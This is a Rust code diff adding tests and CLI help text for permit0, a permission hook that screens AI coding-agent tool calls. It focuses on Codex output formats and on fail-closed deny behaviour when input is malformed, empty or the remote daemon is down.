+            "gmail_send"
+        );
+    }
+
+    #[test]
+    fn output_format_from_client() {
+        assert_eq!(
+            OutputFormat::from_client(ClientKind::Codex),
+            OutputFormat::Codex
+        );
+        assert_eq!(
+            OutputFormat::from_client(ClientKind::ClaudeCode),
+            OutputFormat::ClaudeCode
+        );
+        assert_eq!(
+            OutputFormat::from_client(ClientKind::ClaudeDesktop),
+            OutputFormat::ClaudeCode
+        );
+        assert_eq!(
+            OutputFormat::from_client(ClientKind::OpenClaw),
+            OutputFormat::ClaudeCode
+        );
+        assert_eq!(
+            OutputFormat::from_client(ClientKind::Raw),
+            OutputFormat::ClaudeCode
+        );
+    }
+
+    // ── Codex hook input deserialization ─────────────────────────────
+
+    #[test]
+    fn codex_hook_input_full_payload() {
+        // A full Codex PreToolUse payload must deserialize cleanly and
+        // every captured field must be readable. Reading every field
+        // here also keeps the dead_code lint happy without
+        // `#[allow(dead_code)]` on the struct.
+        let json = r#"{
+            "session_id": "019dba93-8214-7d50-a089-9690b4ce6b9e",
+            "transcript_path": "/home/user/.codex/history/019dba93.jsonl",
+            "cwd": "/home/user/project",
+            "hook_event_name": "PreToolUse",
+            "model": "gpt-5.4",
+            "turn_id": "turn-7",
+            "tool_name": "mcp__permit0-gmail__gmail_send",
+            "tool_use_id": "call_abc123",
+            "tool_input": { "to": "alice@example.com", "subject": "Hi" }
+        }"#;
+        let input: HookInput = serde_json::from_str(json).unwrap();
+        assert_eq!(input.tool_name, "mcp__permit0-gmail__gmail_send");
+        assert_eq!(
+            input.session_id.as_deref(),
+            Some("019dba93-8214-7d50-a089-9690b4ce6b9e"),
+        );
+        assert_eq!(input.turn_id.as_deref(), Some("turn-7"));
+        assert_eq!(input.cwd.as_deref(), Some("/home/user/project"));
+        assert_eq!(input.hook_event_name.as_deref(), Some("PreToolUse"));
+        assert_eq!(input.model.as_deref(), Some("gpt-5.4"));
+        assert_eq!(input.tool_use_id.as_deref(), Some("call_abc123"));
+        assert_eq!(
+            input.transcript_path.as_deref(),
+            Some("/home/user/.codex/history/019dba93.jsonl"),
+        );
+        assert_eq!(input.tool_input["to"], "alice@example.com");
+    }
+
+    #[test]
+    fn hook_input_claude_code_compat() {
+        // The Claude Code minimal payload must continue to deserialize
+        // without errors after HookInput gained Codex-specific optional
+        // fields. None of the Codex fields are populated.
+        let json = r#"{"tool_name": "Bash", "tool_input": {"command": "ls"}}"#;
+        let input: HookInput = serde_json::from_str(json).unwrap();
+        assert_eq!(input.tool_name, "Bash");
+        assert_eq!(input.tool_input["command"], "ls");
+        assert!(input.session_id.is_none());
+        assert!(input.turn_id.is_none());
+        assert!(input.cwd.is_none());
+        assert!(input.hook_event_name.is_none());
+        assert!(input.model.is_none());
+        assert!(input.tool_use_id.is_none());
+        assert!(input.transcript_path.is_none());
+    }
+
+    #[test]
+    fn build_tool_call_metadata_codex_payload() {
+        // Codex stdin context fields flow into `RawToolCall.metadata`
+        // so audit records show the originating thread / turn / model.
+        let json = r#"{
+            "session_id": "019dba93-8214",
+            "transcript_path": "/tmp/x.jsonl",
+            "cwd": "/home/u",
+            "hook_event_name": "PreToolUse",
+            "model": "gpt-5.4",
+            "turn_id": "turn-7",
+            "tool_name": "Bash",
+            "tool_use_id": "call_abc",
+            "tool_input": {"command": "ls"}
+        }"#;
+        let input: HookInput = serde_json::from_str(json).unwrap();
+        let metadata = build_tool_call_metadata(&input);
+        assert_eq!(
+            metadata.get("session_id").and_then(|v| v.as_str()),
+            Some("019dba93-8214")
+        );
+        assert_eq!(
+            metadata.get("turn_id").and_then(|v| v.as_str()),
+            Some("turn-7")
+        );
+        assert_eq!(
+            metadata.get("cwd").and_then(|v| v.as_str()),
+            Some("/home/u")
+        );
+        assert_eq!(
+            metadata.get("hook_event_name").and_then(|v| v.as_str()),
+            Some("PreToolUse"),
+        );
+        assert_eq!(
+            metadata.get("model").and_then(|v| v.as_str()),
+            Some("gpt-5.4")
+        );
+        assert_eq!(
+            metadata.get("tool_use_id").and_then(|v| v.as_str()),
+            Some("call_abc"),
+        );
+        assert_eq!(
+            metadata.get("transcript_path").and_then(|v| v.as_str()),
+            Some("/tmp/x.jsonl"),
+        );
+    }
+
+    #[test]
+    fn build_tool_call_metadata_claude_payload_is_empty() {
+        // Claude Code's minimal payload populates none of the optional
+        // fields, so the metadata map remains empty — preserving the
+        // pre-Codex behavior for non-Codex hooks.
+        let json = r#"{"tool_name": "Bash", "tool_input": {"command": "ls"}}"#;
+        let input: HookInput = serde_json::from_str(json).unwrap();
+        let metadata = build_tool_call_metadata(&input);
+        assert!(
+            metadata.is_empty(),
+            "Claude Code payload must yield empty metadata, got: {metadata:?}"
+        );
+    }
+
+    #[test]
+    fn build_tool_call_metadata_drops_empty_strings() {
+        // Codex sometimes sends `""` for fields it cannot populate
+        // (e.g. transcript_path on first turn). Empty strings must NOT
+        // appear in metadata — they're forensically useless and would
+        // confuse audit queries that filter by presence.
+        let json = r#"{
+            "session_id": "real",
+            "transcript_path": "",
+            "cwd": "",
+            "tool_name": "Bash",
+            "tool_input": {"command": "ls"}
+        }"#;
+        let input: HookInput = serde_json::from_str(json).unwrap();
+        let metadata = build_tool_call_metadata(&input);
+        assert_eq!(
+            metadata.get("session_id").and_then(|v| v.as_str()),
+            Some("real")
+        );
+        assert!(!metadata.contains_key("transcript_path"));
+        assert!(!metadata.contains_key("cwd"));
+    }
+
+    #[test]
+    fn hook_input_codex_null_transcript_path() {
+        // Codex may send `null` for transcript_path; Option<String>
+        // handles this naturally via `#[serde(default)]`.
+        let json = r#"{
+            "session_id": "s1",
+            "transcript_path": null,
+            "tool_name": "Bash",
+            "tool_input": {"command": "ls"}
+        }"#;
+        let input: HookInput = serde_json::from_str(json).unwrap();
+        assert!(input.transcript_path.is_none());
+        assert_eq!(input.session_id.as_deref(), Some("s1"));
+    }
+
+    // ── Codex output serialization ───────────────────────────────────
+
+    #[test]
+    fn codex_output_allow_is_none() {
+        // Allow MUST produce zero stdout bytes for Codex. Codex
+        // explicitly rejects `permissionDecision: "allow"` and would
+        // fail open if we sent it.
+        let output = codex_output(Permission::Allow, "");
+        assert!(
+            output.is_none(),
+            "Allow must produce no stdout for Codex, got: {output:?}",
+        );
+    }
+
+    #[test]
+    fn codex_output_deny_produces_envelope() {
+        let output = codex_output(Permission::Deny, "destructive command blocked").unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&output).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["hookEventName"], "PreToolUse",);
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny",);
+        assert_eq!(
+            parsed["hookSpecificOutput"]["permissionDecisionReason"],
+            "destructive command blocked",
+        );
+    }
+
+    #[test]
+    fn codex_output_hitl_maps_to_deny_with_marker() {
+        // Codex PreToolUse has no "ask" verdict. HITL maps to deny BUT
+        // with the HITL marker appended so users can tell "would have
+        // been an approval prompt" from "Critical-tier hard block".
+        let output =
+            codex_output(Permission::HumanInTheLoop, "permit0: email.send — High").unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&output).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+            .as_str()
+            .unwrap();
+        assert!(
+            reason.contains("permit0: email.send"),
+            "original reason preserved, got: {reason}"
+        );
+        assert!(
+            reason.contains("requires human review"),
+            "HITL marker present, got: {reason}"
+        );
+    }
+
+    #[test]
+    fn codex_deny_envelope_escapes_reason_text() {
+        // The reason is user-visible; if the operator's pack pushes a
+        // reason containing quotes / newlines, the envelope must remain
+        // valid JSON. We go through serde_json (not format!) precisely
+        // to get this for free.
+        let envelope = codex_deny_envelope("contains \"quotes\" and \n newlines");
+        let parsed: serde_json::Value = serde_json::from_str(&envelope).unwrap();
+        assert_eq!(
+            parsed["hookSpecificOutput"]["permissionDecisionReason"],
+            "contains \"quotes\" and \n newlines",
+        );
+    }
+
+    #[test]
+    fn hook_output_to_codex_allow_is_none() {
+        // Allow envelope (Claude shape) → Codex must skip stdout.
+        assert!(hook_output_to_codex(&HookOutput::allow()).is_none());
+    }
+
+    #[test]
+    fn hook_output_to_codex_defer_is_none() {
+        // Defer envelope (no permissionDecision) → Codex must skip
+        // stdout. There's nothing to translate; Codex naturally falls
+        // through to its default behavior for empty stdout.
+        assert!(hook_output_to_codex(&HookOutput::defer()).is_none());
+    }
+
+    #[test]
+    fn hook_output_to_codex_deny_uses_existing_reason() {
+        let json = hook_output_to_codex(&HookOutput::deny("payment.charge — risk 95/100")).unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&json).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        assert_eq!(
+            parsed["hookSpecificOutput"]["permissionDecisionReason"],
+            "payment.charge — risk 95/100",
+        );
+    }
+
+    #[test]
+    fn hook_output_to_codex_ask_maps_to_deny_with_marker() {
+        let json = hook_output_to_codex(&HookOutput::ask("email.send — High")).unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&json).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+            .as_str()
+            .unwrap();
+        assert!(
+            reason.contains("email.send — High"),
+            "original reason preserved, got: {reason}"
+        );
+        assert!(
+            reason.contains("requires human review"),
+            "HITL marker appended for Codex, got: {reason}"
+        );
+    }
+
+    #[test]
+    fn hook_output_to_codex_ask_with_no_reason_uses_marker_text() {
+        // If somehow a HookOutput::ask with no reason reaches the Codex
+        // emitter (defensive — the constructor always sets one), we
+        // still emit a non-empty deny envelope so Codex never sees
+        // empty stdout for an ask verdict.
+        let custom = HookOutput {
+            hook_specific_output: HookSpecificOutput {
+                hook_event_name: "PreToolUse",
+                permission_decision: Some("ask"),
+                permission_decision_reason: None,
+            },
+        };
+        let json = hook_output_to_codex(&custom).unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&json).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+            .as_str()
+            .unwrap();
+        assert!(
+            reason.contains("requires human review"),
+            "HITL marker present even without source reason, got: {reason}"
+        );
+    }
+
+    #[test]
+    fn hook_output_to_codex_never_emits_allow_decision() {
+        // Critical Codex invariant: stdout must never contain
+        // `permissionDecision: "allow"`. Codex explicitly rejects that
+        // form and the tool would fail open with a warning. Use a
+        // structural JSON check (not substring matching) so a deny
+        // reason that happens to contain the literal text "allow" does
+        // not falsely fail.
+        for hook_out in [
+            HookOutput::allow(),
+            HookOutput::deny("test"),
+            HookOutput::ask("test"),
+            HookOutput::defer(),
+        ] {
+            if let Some(json) = hook_output_to_codex(&hook_out) {
+                let parsed: serde_json::Value = serde_json::from_str(&json).unwrap();
+                assert_ne!(
+                    parsed["hookSpecificOutput"]["permissionDecision"], "allow",
+                    "Codex must never produce permissionDecision: allow, got: {json}",
+                );
+            }
+        }
+    }
+
+    #[test]
+    fn hook_output_to_codex_unknown_decision_label_fails_closed() {
+        // Defensive: if a future Claude Code verdict added a new label
+        // (e.g. "quarantine") and somehow flowed into the Codex emit
+        // path, we must block the tool rather than fail open.
+        let custom = HookOutput {
+            hook_specific_output: HookSpecificOutput {
+                hook_event_name: "PreToolUse",
+                permission_decision: Some("quarantine"),
+                permission_decision_reason: Some("speculative".into()),
+            },
+        };
+        let json = hook_output_to_codex(&custom).unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&json).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+            .as_str()
+            .unwrap();
+        assert!(
+            reason.contains("quarantine"),
+            "must surface the unexpected label, got: {reason}",
+        );
+    }
+
+    #[test]
+    fn codex_unknown_defer_yields_empty_stdout() {
+        // Combining `apply_unknown_policy(.., Defer)` with the Codex
+        // emitter must produce zero bytes — defer means "no opinion"
+        // and Codex interprets empty stdout as "let the tool run".
+        let out = HookOutput::ask("permit0: unknown.unclassified");
+        let policy_result = apply_unknown_policy(out, true, UnknownMode::Defer);
+        assert!(
+            hook_output_to_codex(&policy_result).is_none(),
+            "Defer + Codex must skip stdout entirely",
+        );
+    }
+
+    #[test]
+    fn codex_unknown_deny_yields_deny_envelope() {
+        let out = HookOutput::ask("permit0: unknown.unclassified");
+        let policy_result = apply_unknown_policy(out, true, UnknownMode::Deny);
+        let json = hook_output_to_codex(&policy_result).unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&json).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+    }
+
+    #[test]
+    fn codex_unknown_ask_yields_deny_envelope_with_marker() {
+        // `--unknown ask` is the one mode whose output type is
+        // unchanged by `apply_unknown_policy` (it keeps the `ask`
+        // verdict). The Codex emit then converts ask → deny + HITL
+        // marker, which is the most behaviorally distinct combination
+        // and the one the other three (Allow/Deny/Defer) composition
+        // tests don't exercise.
+        let original = HookOutput::ask("permit0: unknown.unclassified");
+        let policy_result = apply_unknown_policy(original, true, UnknownMode::Ask);
+        // Sanity: Ask mode preserves the ask verdict.
+        assert_eq!(
+            policy_result.hook_specific_output.permission_decision,
+            Some("ask"),
+        );
+        let json = hook_output_to_codex(&policy_result).unwrap();
+        let parsed: serde_json::Value = serde_json::from_str(&json).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+            .as_str()
+            .unwrap();
+        assert!(
+            reason.contains("permit0: unknown.unclassified"),
+            "original ask reason preserved, got: {reason}"
+        );
+        assert!(
+            reason.contains("requires human review"),
+            "HITL marker appended, got: {reason}"
+        );
+    }
+
+    #[test]
+    fn codex_unknown_allow_yields_empty_stdout() {
+        // `--unknown allow` rewrites to HookOutput::allow(), which the
+        // Codex emitter correctly turns into zero bytes — Codex would
+        // reject the literal `permissionDecision: "allow"` form.
+        let out = HookOutput::ask("permit0: unknown.unclassified");
+        let policy_result = apply_unknown_policy(out, true, UnknownMode::Allow);
+        assert!(
+            hook_output_to_codex(&policy_result).is_none(),
+            "Unknown::Allow + Codex must skip stdout entirely",
+        );
+    }
+
+    // ── Codex remote daemon mapping ──────────────────────────────────
+
+    #[test]
+    fn codex_remote_human_response_maps_to_deny() {
+        // Pins the end-to-end remote → Codex behavior for HITL using
+        // the canonical daemon value `"human"` (not "humanintheloop").
+        // After the prerequisite fix, the deny envelope must include
+        // the full risk reason — NOT "unknown permission value 'human'".
+        let resp = RemoteCheckResponse {
+            permission: "human".into(),
+            action_type: Some("email.send".into()),
+            channel: Some("gmail".into()),
+            score: Some(62),
+            tier: Some("High".into()),
+            block_reason: None,
+        };
+        let hook_out = remote_response_to_hook_output(&resp);
+        let codex = hook_output_to_codex(&hook_out).expect("HITL must produce a deny envelope");
+        let parsed: serde_json::Value = serde_json::from_str(&codex).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+            .as_str()
+            .unwrap();
+        assert!(
+            reason.contains("email.send"),
+            "reason must include action type, got: {reason}",
+        );
+        assert!(
+            !reason.contains("unknown permission value"),
+            "must NOT show 'unknown permission' for canonical daemon value, got: {reason}",
+        );
+    }
+
+    #[test]
+    fn codex_remote_transport_error_maps_to_deny() {
+        // Remote daemon down → Codex must fail closed (deny). This is
+        // stricter than the Claude path (which prompts the user via
+        // ask), and is the correct Codex behavior since Codex has no
+        // ask verdict in PreToolUse.
+        let err = RemoteError::Transport(
+            "POST http://127.0.0.1:9999/api/v1/check: Connection refused".to_string(),
+        );
+        let (hook_out, _) = remote_error_to_hook_output(&err);
+        let codex = hook_output_to_codex(&hook_out).expect("transport error must produce a deny");
+        let parsed: serde_json::Value = serde_json::from_str(&codex).unwrap();
+        assert_eq!(parsed["hookSpecificOutput"]["permissionDecision"], "deny");
+        let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+            .as_str()
+            .unwrap();
+        assert!(
+            reason.contains("permit0 remote unavailable"),
+            "deny reason must explain transport failure, got: {reason}",
+        );
+    }
+
+    // ── Codex session ID derivation ──────────────────────────────────
+
+    #[test]
+    fn codex_session_id_from_stdin() {
+        let id =
+            derive_session_id_for_format(OutputFormat::Codex, Some("019dba93-8214".into()), None);
+        assert_eq!(id, "019dba93-8214");
+    }
+
+    #[test]
+    fn codex_session_id_explicit_overrides_stdin() {
+        let id = derive_session_id_for_format(
+            OutputFormat::Codex,
+            Some("stdin-id".into()),
+            Some("explicit-id".into()),
+        );
+        assert_eq!(id, "explicit-id");
+    }
+
+    #[test]
+    fn codex_session_id_empty_stdin_falls_through() {
+        // An empty-string `session_id` from Codex must be treated as
+        // absent — falling through to env var / PPID. Otherwise an
+        // empty payload field would poison the session store.
+        let id = derive_session_id_for_format(OutputFormat::Codex, Some(String::new()), None);
+        // Should NOT be the empty string; falls through to ppid_fallback.
+        assert!(!id.is_empty(), "empty stdin must not pin to empty id");
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn codex_session_id_falls_through_to_ppid_not_claude_env() {
+        // Codex must NEVER consult CLAUDE_SESSION_ID — a stale Claude
+        // env var in a side-by-side Claude+Codex workstation would
+        // otherwise cross-contaminate the Codex session.
+        //
+        // We don't manipulate env vars here (would race with parallel
+        // tests under cargo test). Instead we rely on the structural
+        // contract: when stdin is absent and CODEX_THREAD_ID is unset
+        // (the default test environment), the result must be the
+        // PPID fallback shape `ppid-<n>` regardless of whether
+        // CLAUDE_SESSION_ID happens to be set in the test process.
+        // If CODEX_THREAD_ID is set in the environment for some
+        // reason, this assertion's failure mode is informative
+        // enough — it will print the unexpected ID.
+        let id = derive_session_id_for_format(OutputFormat::Codex, None, None);
+        if std::env::var_os("CODEX_THREAD_ID").is_none() {
+            assert!(
+                id.starts_with("ppid-"),
+                "Codex must use PPID fallback (not CLAUDE_SESSION_ID), got: {id}",
+            );
+        }
+    }
+
+    #[test]
+    fn claude_session_id_ignores_stdin() {
+        // Under Claude Code format, stdin session_id is not consulted
+        // (Claude doesn't put it in stdin payloads). The function
+        // should fall through to the existing derive_session_id path.
+        // To assert this without env-var contamination, give an
+        // explicit flag — that wins regardless of format.
+        let id = derive_session_id_for_format(
+            OutputFormat::ClaudeCode,
+            Some("ignored-stdin".into()),
+            Some("explicit".into()),
+        );
+        assert_eq!(id, "explicit");
+    }
+
+    // ── Codex emit_hook_output ───────────────────────────────────────
+
+    #[test]
+    fn emit_hook_output_codex_allow_writes_nothing_visible() {
+        // Compile-only sanity check: `emit_hook_output` does I/O so we
+        // can't capture stdout from a unit test trivially, but we can
+        // verify the helper compiles for both formats and that
+        // hook_output_to_codex agrees with the contract for allow.
+        // (The end-to-end "empty stdout" behavior is verified in the
+        // integration test suite.)
+        let allow = HookOutput::allow();
+        assert!(hook_output_to_codex(&allow).is_none());
     }
 }

--- a/crates/permit0-cli/src/main.rs
+++ b/crates/permit0-cli/src/main.rs
@@ -34,7 +34,9 @@ enum Commands {
         #[arg(long, default_value = "default.org")]
         org_domain: String,
     },
-    /// Claude Code PreToolUse hook adapter (reads JSON from stdin)
+    /// PreToolUse hook adapter for Claude Code, Claude Desktop, OpenClaw,
+    /// and OpenAI Codex (reads JSON from stdin; output format varies by
+    /// `--client`).
     Hook {
         /// Domain profile to use
         #[arg(long)]
@@ -45,7 +47,9 @@ enum Commands {
         /// SQLite database path for session persistence
         #[arg(long)]
         db: Option<String>,
-        /// Session ID (default: derived from CLAUDE_SESSION_ID or PPID)
+        /// Session ID. Default: derived from the client-specific source
+        /// (CLAUDE_SESSION_ID for Claude Code; stdin `session_id` then
+        /// CODEX_THREAD_ID for Codex), falling back to PPID/cwd.
         #[arg(long)]
         session_id: Option<String>,
         /// Path to packs directory (default: ./packs/ or ~/.permit0/packs/)
@@ -57,15 +61,18 @@ enum Commands {
         #[arg(long)]
         shadow: bool,
         /// Which MCP host (agent) is calling the hook. Controls how
-        /// MCP tool-name prefixes are stripped before normalization.
-        /// Supported: claude-code (default), claude-desktop, raw.
-        /// Override via PERMIT0_CLIENT env var.
+        /// MCP tool-name prefixes are stripped and how verdicts are
+        /// serialized to stdout. Supported: claude-code (default),
+        /// claude-desktop, openclaw, codex, raw. Override via
+        /// PERMIT0_CLIENT env var.
         #[arg(long, value_name = "CLIENT")]
         client: Option<String>,
         /// Delegate evaluation to a running `permit0 serve --ui` daemon at
         /// the given URL instead of evaluating in-process. The hook POSTs
         /// to `<URL>/api/v1/check` and translates the response into the
-        /// Claude Code hookSpecificOutput envelope.
+        /// `--client`-appropriate envelope (Claude Code-shaped for Claude
+        /// Code, Claude Desktop, OpenClaw, Raw; Codex-shaped or empty
+        /// stdout for Codex).
         ///
         /// Pairs with `serve --ui --calibrate` to centralize approvals
         /// through the dashboard. When set, --profile / --packs-dir / --db
@@ -79,11 +86,15 @@ enum Commands {
         /// (i.e. the action normalizes to `unknown.unclassified` and the
         /// engine's verdict is the fallback "ask"). One of:
         ///
-        ///   ask    — prompt the user with permit0's reasoning
-        ///   allow  — let the tool run unprompted
-        ///   deny   — block the tool
-        ///   defer  — emit no permissionDecision; Claude Code's own
-        ///            permission flow handles it (default)
+        ///   ask    — prompt the user with permit0's reasoning (Claude
+        ///            Code: ask envelope; Codex: deny envelope, since
+        ///            Codex PreToolUse has no `ask` verdict)
+        ///   allow  — let the tool run unprompted (Claude Code: allow
+        ///            envelope; Codex: empty stdout)
+        ///   deny   — block the tool (deny envelope on every client)
+        ///   defer  — fall through to the client's native flow (Claude
+        ///            Code: no permissionDecision; Codex: empty stdout)
+        ///            — default
         ///
         /// Override via PERMIT0_UNKNOWN env var.
         #[arg(long, value_name = "MODE")]

--- a/crates/permit0-cli/tests/cli_tests.rs
+++ b/crates/permit0-cli/tests/cli_tests.rs
@@ -312,3 +312,313 @@ fn invalid_json_fails() {
         .unwrap();
     assert!(!output.status.success());
 }
+
+// ── Codex hook integration tests ─────────────────────────────────────
+//
+// Codex's PreToolUse contract treats a non-zero exit, malformed stdout,
+// or any output containing `permissionDecision: "allow"` as fail-open
+// (the tool runs anyway with a warning). These tests run the full
+// permit0 binary as a subprocess to verify end-to-end:
+//
+// - Empty stdout for "no objection" (allow / defer / shadow paths)
+// - Valid deny envelope for blocks (unknown deny, malformed stdin,
+//   remote daemon down)
+// - Never emits the forbidden `"permissionDecision":"allow"` form
+//
+// Process-level tests are essential here because the failure modes are
+// at the I/O boundary, not inside the type system.
+
+const CODEX_UNKNOWN_TOOL_JSON: &str = r#"{
+    "session_id": "codex-test-1",
+    "transcript_path": "/tmp/codex.jsonl",
+    "cwd": "/tmp",
+    "hook_event_name": "PreToolUse",
+    "model": "gpt-5.4",
+    "turn_id": "turn-1",
+    "tool_name": "completely_unknown_widget",
+    "tool_use_id": "call-1",
+    "tool_input": {}
+}"#;
+
+const CODEX_GMAIL_SEND_JSON: &str = r#"{
+    "session_id": "codex-test-1",
+    "transcript_path": "/tmp/codex.jsonl",
+    "cwd": "/tmp",
+    "hook_event_name": "PreToolUse",
+    "model": "gpt-5.4",
+    "turn_id": "turn-2",
+    "tool_name": "mcp__permit0-gmail__gmail_send",
+    "tool_use_id": "call-2",
+    "tool_input": {"to": "bob@external.com", "subject": "Hi", "body": "ok"}
+}"#;
+
+fn run_codex_hook(args: &[&str], stdin: &str) -> std::process::Output {
+    let mut child = permit0_bin()
+        .args(args)
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped())
+        .spawn()
+        .unwrap();
+    child
+        .stdin
+        .take()
+        .unwrap()
+        .write_all(stdin.as_bytes())
+        .unwrap();
+    child.wait_with_output().unwrap()
+}
+
+#[test]
+fn codex_hook_unknown_defer_produces_empty_stdout() {
+    // Codex defer/allow contract: zero stdout bytes = "no objection".
+    // Any other output (even an empty-string println with a newline)
+    // may trigger Codex's invalid-JSON warning path.
+    let output = run_codex_hook(
+        &["hook", "--client", "codex", "--unknown", "defer"],
+        CODEX_UNKNOWN_TOOL_JSON,
+    );
+    assert!(
+        output.status.success(),
+        "hook exited non-zero: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+    assert!(
+        output.stdout.is_empty(),
+        "Codex defer MUST produce zero stdout bytes, got: {:?}",
+        String::from_utf8_lossy(&output.stdout)
+    );
+}
+
+#[test]
+fn codex_hook_unknown_deny_produces_deny_envelope() {
+    let output = run_codex_hook(
+        &["hook", "--client", "codex", "--unknown", "deny"],
+        CODEX_UNKNOWN_TOOL_JSON,
+    );
+    assert!(
+        output.status.success(),
+        "hook exited non-zero: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+    let parsed: serde_json::Value = serde_json::from_slice(&output.stdout).unwrap_or_else(|e| {
+        panic!(
+            "stdout must be valid JSON for deny: err={e}, stdout={}",
+            String::from_utf8_lossy(&output.stdout)
+        )
+    });
+    assert_eq!(
+        parsed["hookSpecificOutput"]["hookEventName"], "PreToolUse",
+        "deny envelope must declare PreToolUse",
+    );
+    assert_eq!(
+        parsed["hookSpecificOutput"]["permissionDecision"], "deny",
+        "Codex --unknown deny must produce permissionDecision: deny",
+    );
+    assert!(
+        parsed["hookSpecificOutput"]["permissionDecisionReason"].is_string(),
+        "deny envelope must include a reason",
+    );
+}
+
+#[test]
+fn codex_hook_malformed_stdin_fails_closed() {
+    // CRITICAL: in Codex, fail-open semantics mean a malformed stdin
+    // (which `?`-style error propagation would surface as exit 1) would
+    // let the tool execute. The fail-closed wrapper must convert this
+    // into a deny envelope or exit 2 (also a Codex block).
+    let output = run_codex_hook(&["hook", "--client", "codex"], "not valid json");
+    if output.status.success() {
+        // Preferred: structured deny envelope.
+        let parsed: serde_json::Value = serde_json::from_slice(&output.stdout)
+            .expect("malformed stdin must produce valid JSON");
+        assert_eq!(
+            parsed["hookSpecificOutput"]["permissionDecision"],
+            "deny",
+            "malformed stdin must fail closed to deny, got: {}",
+            String::from_utf8_lossy(&output.stdout),
+        );
+    } else {
+        // Acceptable fallback: exit 2 (Codex treats this as a block).
+        // Bare exit 1 fails open in Codex and is a security bug.
+        assert_eq!(
+            output.status.code(),
+            Some(2),
+            "Codex fail-closed must use exit 2, got {:?} stderr={}",
+            output.status.code(),
+            String::from_utf8_lossy(&output.stderr),
+        );
+    }
+}
+
+#[test]
+fn codex_hook_empty_stdin_fails_closed() {
+    // Zero-byte stdin is another shape of "input we can't parse" — Codex
+    // would fail open if the hook just exited 1. Same fail-closed
+    // contract as malformed JSON: either a structured deny envelope on
+    // stdout (exit 0) or exit code 2 with stderr reason.
+    let output = run_codex_hook(&["hook", "--client", "codex"], "");
+    if output.status.success() {
+        let parsed: serde_json::Value = serde_json::from_slice(&output.stdout)
+            .expect("empty stdin must produce a parseable deny envelope");
+        assert_eq!(
+            parsed["hookSpecificOutput"]["permissionDecision"],
+            "deny",
+            "empty stdin must fail closed to deny, got: {}",
+            String::from_utf8_lossy(&output.stdout),
+        );
+    } else {
+        assert_eq!(
+            output.status.code(),
+            Some(2),
+            "Codex fail-closed must use exit 2 for empty stdin, got {:?} stderr={}",
+            output.status.code(),
+            String::from_utf8_lossy(&output.stderr),
+        );
+    }
+}
+
+#[test]
+fn codex_hook_remote_daemon_down_fails_closed() {
+    // Pointed at an unreachable port → transport error. The remote
+    // error mapper returns HookOutput::ask, which the Codex emitter
+    // converts to a deny envelope (Codex has no `ask`, so HITL/transport
+    // failures fall through to deny).
+    let output = run_codex_hook(
+        &[
+            "hook",
+            "--client",
+            "codex",
+            "--remote",
+            "http://127.0.0.1:1",
+        ],
+        CODEX_GMAIL_SEND_JSON,
+    );
+    assert!(
+        output.status.success(),
+        "hook exited non-zero: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+    let parsed: serde_json::Value = serde_json::from_slice(&output.stdout).unwrap_or_else(|e| {
+        panic!(
+            "remote-down stdout must be valid JSON: err={e}, stdout={}",
+            String::from_utf8_lossy(&output.stdout)
+        )
+    });
+    assert_eq!(
+        parsed["hookSpecificOutput"]["permissionDecision"],
+        "deny",
+        "Codex must deny when daemon is unreachable, got: {}",
+        String::from_utf8_lossy(&output.stdout),
+    );
+    let reason = parsed["hookSpecificOutput"]["permissionDecisionReason"]
+        .as_str()
+        .unwrap_or_default();
+    assert!(
+        reason.contains("remote unavailable"),
+        "deny reason must explain transport failure, got: {reason}",
+    );
+}
+
+#[test]
+fn codex_hook_shadow_produces_empty_stdout() {
+    // Shadow mode forces HookOutput::allow internally. Under Codex,
+    // that converts to zero stdout bytes. The shadow log goes to
+    // stderr; stdout must be empty so Codex sees "no objection".
+    let output = run_codex_hook(
+        &[
+            "hook",
+            "--client",
+            "codex",
+            "--shadow",
+            "--unknown",
+            "defer",
+        ],
+        CODEX_GMAIL_SEND_JSON,
+    );
+    assert!(
+        output.status.success(),
+        "hook exited non-zero: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+    assert!(
+        output.stdout.is_empty(),
+        "Codex shadow allow must be zero stdout bytes, got: {:?}",
+        String::from_utf8_lossy(&output.stdout)
+    );
+}
+
+#[test]
+fn codex_hook_minimal_claude_payload_does_not_error() {
+    // Codex back-compat: passing a Claude-style minimal payload through
+    // `--client codex` must not error (HookInput has all Codex fields
+    // optional). The output should be either empty (defer/allow) or a
+    // valid deny envelope.
+    let claude_minimal = r#"{"tool_name":"completely_unknown_widget","tool_input":{}}"#;
+    let output = run_codex_hook(
+        &["hook", "--client", "codex", "--unknown", "defer"],
+        claude_minimal,
+    );
+    assert!(
+        output.status.success(),
+        "minimal payload must not error: {}",
+        String::from_utf8_lossy(&output.stderr)
+    );
+    // Defer + Codex = zero stdout bytes.
